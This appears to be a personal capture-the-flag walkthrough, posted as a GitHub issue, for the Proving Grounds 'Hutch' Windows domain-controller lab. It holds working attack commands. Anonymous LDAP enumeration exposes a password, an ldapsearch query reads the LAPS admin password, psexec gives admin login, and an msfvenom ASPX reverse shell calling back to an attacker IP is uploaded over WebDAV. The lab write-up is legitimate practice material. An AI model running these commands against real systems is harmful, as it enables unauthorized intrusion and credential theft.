search

WDavid404 / PG-Box

PG box workthough note
0 stars 0 forks source link

Hutch (Intermediate, Windows) - ldap #47

Open WDavid404 opened 1 month ago

WDavid404 commented 1 month ago

Keypoints: ldap

WDavid404 commented 1 month ago 
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 125 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 125 Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  syn-ack ttl 125 Microsoft Windows Kerberos (server time: 2024-08-03 03:13:18Z)
135/tcp   open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 125 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 125
464/tcp   open  kpasswd5?     syn-ack ttl 125
593/tcp   open  ncacn_http    syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 125
3268/tcp  open  ldap          syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 125
5985/tcp  open  http          syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        syn-ack ttl 125 .NET Message Framing
49666/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49673/tcp open  ncacn_http    syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49676/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49692/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC
49878/tcp open  msrpc         syn-ack ttl 125 Microsoft Windows RPC

80/tcp feroxbuster -u http://192.168.241.122 -k -C 404,503,502 --> no useful info

139/tcp crackmapexec smb 192.168.241.122 --shares --> SMB 192.168.241.122 445 HUTCHDC [*] Windows 10.0 Build 17763 x64 (name:HUTCHDC) (domain:hutch.offsec) (signing:True) (SMBv1:False)

smbclient --no-pass //hutch.offsec/HUTCHDC/ --->

Anonymous login successful
tree connect failed: NT_STATUS_BAD_NETWORK_NAME

389/tcp (LDAP) nmap -->

389/tcp open  ldap    syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: hutch.offsec, Site: Default-First-Site-Name)
| ldap-rootdse: 
| LDAP Results
|   <ROOT>
|       domainFunctionality: 7
|       forestFunctionality: 7
|       domainControllerFunctionality: 7
|       rootDomainNamingContext: DC=hutch,DC=offsec
|       ldapServiceName: hutch.offsec:hutchdc$@HUTCH.OFFSEC
|       isGlobalCatalogReady: TRUE
|       supportedSASLMechanisms: GSSAPI
|       supportedSASLMechanisms: GSS-SPNEGO
|       supportedSASLMechanisms: EXTERNAL
|       supportedSASLMechanisms: DIGEST-MD5
.....

ldapsearch -H ldap://192.168.241.122 -x -s base namingcontexts ldapsearch -x -H ldap://192.168.241.122 -D '' -w '' -b "DC=hutch,DC=offsec" image ---> fmcsorley:CrabSharkJellyfish192

crackmapexec smb 192.168.241.122 --shares -u fmcsorley -p CrabSharkJellyfish192 image

smbclient //hutch.offsec/NETLOGON --user fmcsorley%CrabSharkJellyfish192 --> failed

ldapsearch -x -H ldap://192.168.241.122 -D 'hutch\fmcsorley' -w 'CrabSharkJellyfish192' -b 'dc=hutch,dc=offsec' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd image

impacket-psexec "HUTCH/Administrator@192.168.241.122" image

WDavid404 commented 1 month ago

Another method

Nikto for 80/tcp image --> webdav is enabled.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.205 LPORT=80 --platform Windows -a x64 -f aspx -o shell.aspx 

curl -T '/home/kali/shell.aspx' 'http://192.168.241.122/' -u fmcsorley:CrabSharkJellyfish192
## -T , --upload-file

Browsing to 192.168.241.122/shell.aspx --> Got a reverse shell

See https://juggernaut-sec.com/proving-grounds-hutch/

image Unfortunately, due to this being a Server 2019 machine we will not be able to utilize a Potato attack; however, this version of Windows Server is vulnerable to PrintSpoofer! image